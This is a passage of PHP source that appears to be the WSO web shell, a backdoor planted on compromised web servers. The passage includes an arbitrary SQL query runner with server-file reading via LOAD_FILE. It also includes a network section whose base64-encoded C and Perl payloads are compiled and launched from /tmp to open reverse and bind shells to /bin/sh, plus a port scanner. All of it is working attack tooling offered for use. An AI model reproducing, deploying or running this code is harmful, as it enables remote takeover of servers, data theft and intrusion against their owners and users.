1350 <input type=hidden name=p2>
1351 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
1352 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
1353 <td>
1354 <select name='type'>
1355 <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
1356 <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
1357 </select></td>
1358 <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
1359 <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
1360 <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
1361 <td>
1362 <?php
1363 $tmp = "<input type=text name=sql_base value=''>";
1364 if(isset($_POST['sql_host'])){
1365 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1366 switch($_POST['charset']) {
1367 case "Windows-1251": $db->setCharset('cp1251'); break;
1368 case "UTF-8": $db->setCharset('utf8'); break;
1369 case "KOI8-R": $db->setCharset('koi8r'); break;
1370 case "KOI8-U": $db->setCharset('koi8u'); break;
1371 case "cp866": $db->setCharset('cp866'); break;
1372 }
1373 $db->listDbs();
1374 echo "<select name=sql_base><option value=''></option>";
1375 while($item = $db->fetch()) {
1376 list($key, $value) = each($item);
1377 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1378 }
1379 echo '</select>';
1380 }
1381 else echo $tmp;
1382 }else
1383 echo $tmp;
1384 ?></td>
1385 <td><input type=submit value=">>"></td>
1386 </tr>
1387 </table>
1388 <script>
1389 function st(t,l) {
1390 document.sf.p1.value = 'select';
1391 document.sf.p2.value = t;
1392 if(l!=null)document.sf.p3.value = l;
1393 document.sf.submit();
1394 }
1395 function is() {
1396 for(i=0;i<document.sf.elements['tbl[]'].length;++i)
1397 document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
1398 }
1399 </script>
1400 <?php
1401 if(isset($db) && $db->link){
1402 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1403 if(!empty($_POST['sql_base'])){
1404 $db->selectdb($_POST['sql_base']);
1405 echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
1406 $tbls_res = $db->listTables();
1407 while($item = $db->fetch($tbls_res)) {
1408 list($key, $value) = each($item);
1409 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1410 $value = htmlspecialchars($value);
1411 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1412 }
1413 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
1414 if(@$_POST['p1'] == 'select') {
1415 $_POST['p1'] = 'query';
1416 $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1417 $num = $db->fetch();
1418 $num = $num['n'];
1419 echo "<span>".$_POST['p2']."</span> ($num) ";
1420 for($i=0;$i<($num/30);$i++)
1421 if($i != (int)$_POST['p3'])
1422 echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
1423 else
1424 echo ($i+1)," ";
1425 if($_POST['type']=='pgsql')
1426 $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1427 else
1428 $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1429 echo "<br><br>";
1430 }
1431 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
1432 $db->query(@$_POST['p3']);
1433 if($db->res !== false) {
1434 $title = false;
1435 echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
1436 $line = 1;
1437 while($item = $db->fetch()) {
1438 if(!$title) {
1439 echo '<tr>';
1440 foreach($item as $key => $value)
1441 echo '<th>'.$key.'</th>';
1442 reset($item);
1443 $title=true;
1444 echo '</tr><tr>';
1445 $line = 2;
1446 }
1447 echo '<tr class="l'.$line.'">';
1448 $line = $line==1?2:1;
1449 foreach($item as $key => $value) {
1450 if($value == null)
1451 echo '<td><i>null</i></td>';
1452 else
1453 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1454 }
1455 echo '</tr>';
1456 }
1457 echo '</table>';
1458 } else {
1459 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1460 }
1461 }
1462 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
1463 echo "</td></tr>";
1464 }
1465 echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1466 if(@$_POST['p1'] == 'loadfile') {
1467 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1468 $file = $db->fetch();
1469 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1470 }
1471 }
1472 echo '</div>';
1473 printFooter();
1474}
1475// Sql end -------------------------
1476// Network go --------------------
1477function actionNetwork() {
1478 printHeader();
1479 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1480 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1481 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1482 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1483 echo "<h1>Network tools</h1><div class=content>
1484 <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
1485 <span>Bind port to /bin/sh</span><br/>
1486 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'>
1487 </form>
1488 <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
1489 <span>Back-connect to</span><br/>
1490 Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'>
1491 </form><br>";
1492 if(isset($_POST['p1'])) {
1493 function cf($f,$t) {
1494 $w=@fopen($f,"w") or @function_exists('file_put_contents');
1495 if($w) {
1496 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1497 @fclose($w);
1498 }
1499 }
1500 if($_POST['p1'] == 'bpc') {
1501 cf("/tmp/bp.c",$bind_port_c);
1502 $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1503 @unlink("/tmp/bp.c");
1504 $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1505 echo "<pre class=ml1>$out".ex("ps aux | grep bp")."</pre>";
1506 }
1507 if($_POST['p1'] == 'bpp') {
1508 cf("/tmp/bp.pl",$bind_port_p);
1509 $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1510 echo "<pre class=ml1>$out".ex("ps aux | grep bp.pl")."</pre>";
1511 }
1512 if($_POST['p1'] == 'bcc') {
1513 cf("/tmp/bc.c",$back_connect_c);
1514 $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1515 @unlink("/tmp/bc.c");
1516 $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1517 echo "<pre class=ml1>$out".ex("ps aux | grep bc")."</pre>";
1518 }
1519 if($_POST['p1'] == 'bcp') {
1520 cf("/tmp/bc.pl",$back_connect_p);
1521 $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1522 echo "<pre class=ml1>$out".ex("ps aux | grep bc.pl")."</pre>";
1523 }
1524 }
1525 echo '</div>';
1526 printFooter();
1527}
1528// Network end --------------------
1529// Port Scanner go --------------------
1530function actionPortScanner() {
1531 printHeader();
1532 echo '<h1>Port Scanner</h1>';
1533 echo '<div class="content">';
1534 echo '<form action="" method="post">';
1535
1536 if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
1537 $start = strip_tags($_POST['start']);
1538 $end = strip_tags($_POST['end']);
1539 $host = strip_tags($_POST['host']);
1540 for($i = $start; $i<=$end; $i++){
1541 $fp = @fsockopen($host, $i, $errno, $errstr, 3);
1542 if($fp){
1543 echo 'Port '.$i.' is <font color=lime>open</font><br>';
1544 }
1545 flush();
1546 }
1547 } else {
1548 echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
1549 <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
1550 <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1551 Host: <input type="text" name="host" value="localhost"/><br /><br />
1552 Port start: <input type="text" name="start" value="0"/><br /><br />
1553 Port end:<input type="text" name="end" value="5000"/><br /><br />
1554 <input type="submit" value="Scan Ports" />
1555 </form></center><br /><br />';
1556 }
1557 echo '</div>';
1558 printFooter();
1559}
1560// Port Scanner end --------------------
1561if( empty($_POST['a']) )
1562 if(isset($default_action) && function_exists('action' . $default_action))
1563 $_POST['a'] = $default_action;
1564 else
1565 $_POST['a'] = 'FilesMan';
1566if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
1567 call_user_func('action' . $_POST['a']);
1568?>